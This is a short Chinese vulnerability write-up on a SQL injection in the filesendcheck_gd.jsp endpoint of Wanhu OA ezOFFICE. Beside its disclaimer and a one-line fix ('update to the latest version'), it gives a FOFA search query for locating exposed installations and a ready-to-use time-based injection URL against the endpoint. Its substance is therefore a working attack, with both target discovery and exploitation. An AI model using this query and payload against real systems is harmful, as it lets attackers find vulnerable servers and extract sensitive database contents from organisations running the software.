文章目录
- 免责申明
- 漏洞描述
- 搜索语法
- 漏洞复现
- 修复建议
免责申明
本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任
漏洞描述
万户OA-ezOFFICE filesendcheck_gd.jsp接口处存在sql注入漏洞,攻击者可通过该漏洞获取数据库敏感信息
搜索语法
fofa
body="/defaultroot/template/css/template_system/template.reset.min.css"
漏洞复现
payload
http://ip/defaultroot/modules/govoffice/gov_documentmanager/filesendcheck_gd.jsp;.js?recordId=1;waitfor+delay'0:0:15'--+
修复建议
更新到最新版本